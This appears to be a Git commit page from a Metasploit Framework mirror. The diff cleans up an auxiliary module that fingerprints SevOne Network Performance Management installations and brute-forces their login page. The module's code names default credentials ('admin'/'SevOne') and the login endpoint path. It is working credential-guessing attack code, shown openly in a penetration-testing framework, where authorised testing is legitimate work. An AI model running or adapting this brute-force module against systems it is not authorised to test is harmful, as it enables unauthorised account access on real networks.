infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add final cleanup for sevone_enum

unstable
jvazquez-r7 2013-06-10 13:16:22 -05:00
parent 6765a911a4
commit 0c6dbe9885
1 changed files with 14 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
modules/auxiliary/scanner/http/sevone_enum.rb
View File

@ -19,18 +19,18 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info, super(update_info(info,
'Name' => 'SevOne Network Performance Management Application Brute Force Login Utility', 'Name' => 'SevOne Network Performance Management Application Brute Force Login Utility',
'Description' => %{ 'Description' => %{
This module scans for SevOne Network Performance Management System Application, finds its version, This module scans for SevOne Network Performance Management System Application,
and performs login brute force to identify valid credentials.}, finds its version, and performs login brute force to identify valid credentials.
},
'Author' => 'Author' =>
[ [
'Karn Ganeshen <KarnGaneshen[at]gmail.com>', 'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
], ],
'DisclosureDate' => 'Jun 07, 2013', 'DisclosureDate' => 'Jun 07 2013',
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) ))
register_options( register_options(
[ [
Opt::RPORT(80),
OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']), OptString.new('USERNAME', [false, 'A specific username to authenticate as', 'admin']),
OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'SevOne']) OptString.new('PASSWORD', [false, 'A specific password to authenticate with', 'SevOne'])
], self.class) ], self.class)
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip) def run_host(ip)
unless is_app_sevone? unless is_app_sevone?
print_error("Application does not appear to be SevOne. Module will not continue.") print_error("Application does not appear to be SevOne. Module will not continue.")
return return
end end
print_status("Starting login brute force...") print_status("Starting login brute force...")
@ -60,10 +60,11 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.code.to_i == 200 and res.headers['Set-Cookie'].include?('SEVONE')) if (res and res.code.to_i == 200 and res.headers['Set-Cookie'].include?('SEVONE'))
version_key = /Version: <strong>(.+)<\/strong>/ version_key = /Version: <strong>(.+)<\/strong>/
version = res.body.scan(version).flatten version = res.body.scan(version_key).flatten
print_good("Application confirmed to be SevOne Network Performance Management System version #{version}") print_good("Application confirmed to be SevOne Network Performance Management System version #{version}")
success = true return true
end end
return false
end end
# #
@ -76,12 +77,12 @@ class Metasploit3 < Msf::Auxiliary
{ {
'uri' => "/doms/login/processLogin.php", 'uri' => "/doms/login/processLogin.php",
'method' => 'GET', 'method' => 'GET',
vars_get => 'vars_get' =>
{ {
'login' = user, 'login' => user,
'passwd' = pass, 'passwd' => pass,
'tzOffset' = '-25200', 'tzOffset' => '-25200',
'tzString' = 'Thur+May+05+1983+05:05:00+GMT+0700+' 'tzString' => 'Thur+May+05+1983+05:05:00+GMT+0700+'
} }
}) })
@ -109,7 +110,6 @@ class Metasploit3 < Msf::Auxiliary
end end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
res = false
print_error("HTTP Connection Failed, Aborting") print_error("HTTP Connection Failed, Aborting")
return :abort return :abort
end end